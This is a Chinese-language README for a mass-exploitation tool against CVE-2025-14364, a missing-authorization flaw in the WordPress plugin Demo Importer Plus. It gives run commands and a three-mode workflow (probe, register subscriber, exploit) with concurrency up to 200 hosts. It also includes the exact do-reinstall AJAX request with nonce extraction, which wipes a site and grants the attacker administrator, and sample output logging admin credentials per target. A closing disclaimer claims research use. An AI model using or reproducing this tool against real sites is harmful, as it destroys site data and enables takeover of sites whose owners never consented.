Demo Importer Plus ≤ 2.0.8 — 缺少授权导致已认证(订阅者+)站点重置和权限提升
_ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ /| |_|_ _) |_ |_|_
\_ \/ |_ /_ \_/ /_ _) | | _) |_) |
已认证的订阅者 → 管理员,通过
do-reinstallAJAX 动作
根本原因:
Ajax::handle_request() 注册了 demo_importer_plus AJAX 动作,但未调用 current_user_can()。任何已认证的订阅者可以发送 {"demo_action":"do-reinstall"} 来触发 wp_install(),该函数会删除所有数据库表(除 users / usermeta 外)并重新运行 WordPress 安装程序——在此过程中自动将攻击账户分配为 管理员角色。
模式 1 — 诊断
探测:DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
→ 识别活跃 WordPress 目标
模式 2 — 注册
POST /wp-login.php?action=register
→ 创建订阅者账户
→ 激活邮件发送至收件箱
↳ 你必须在运行模式 3 之前点击邮件链接
模式 3 — 利用
POST /wp-login.php → 以订阅者身份认证
GET /wp-admin/ → 提取 wp-rest-nonce
POST /wp-admin/admin-ajax.php
action=demo_importer_plus
{"demo_action":"do-reinstall"} → 触发全站重置
← 响应:"站点已成功重置"
→ 攻击账户现在持有管理员角色
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py
requirements.txt
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0
模式 [1/2/3]: 1 = 诊断 2 = 注册 3 = 利用
目标文件: list.txt (每行一个主机)
并发数: 默认 30,最大 200
超时时间: 默认 10秒
目标格式 — list.txt:
https://target1.com
target2.com
http://target3.com
探测每个主机的四个端点,并写入干净的结果。
Mode: 1
输出 → diagnostics_results.txt · passed_targets.txt
Mode: 2
Email: [email protected]
Username: Nxploited
Password: NxploitedSA
检查你的收件箱,并在运行模式 3 之前点击激活链接。
输出 → register_results.txt
Mode: 3
Username: Nxploited
Password: NxploitedSA
成功时工具输出:
[HH:MM:SS] SUCCESS "success":true,"message":"Site has been reset successfully" -> https://target.com
并写入 exploit_results.txt:
https://target.com/wp-login.php site:... user:Nxploited pass:NxploitedSA type:admin
易受攻击的请求:
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>
{"demo_action":"do-reinstall"}
成功响应:
{"success": true, "data": {"message": "Site has been reset successfully"}}
Nonce 提取 — 两个备用来源:
wpApiSettings.nonce (来自 /wp-admin/ 页面源代码)
elementorOneSettingsData.wpRestNonce (备用)
By : Nxploited (Khaled Alenazi)
GitHub : https://github.com/Nxploited
Telegram : @KNxploited
本软件严格用于安全研究和教育目的。
作者对该工具被用于操作者未拥有或未获得明确书面授权测试的系统
所产生的任何行为不承担任何责任。
未经授权对第三方系统使用本软件违反大多数司法管辖区的计算机犯罪法律
(CFAA、CMA 及全球等效法律),并可能导致刑事起诉。
你独自负责确保在运行本工具对抗任何目标之前拥有合法权限。
| CVE | CVE-2025-14364 |
| CVSS v3.1 | 8.8 高 — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| 插件 | Demo Importer Plus |
| 受影响版本 | 所有版本 ≤ 2.0.8 |
| 所需认证 | 订阅者(最低注册角色) |
| 类型 | 缺少权限检查 → 全站重置 → 权限提升 |
| CWE | CWE-862 · 缺少授权 |
| 文件 | 内容 |
|---|
diagnostics_results.txt | 每个目标的完整探测 JSON |
passed_targets.txt | 干净的目标(未检测到错误) |
register_results.txt | 注册尝试记录 |
exploit_results.txt | 登录 · nonce · 重置结果 · 确认管理员命中 |
reset_results.txt | 每个目标的原始 do-reinstall 响应 |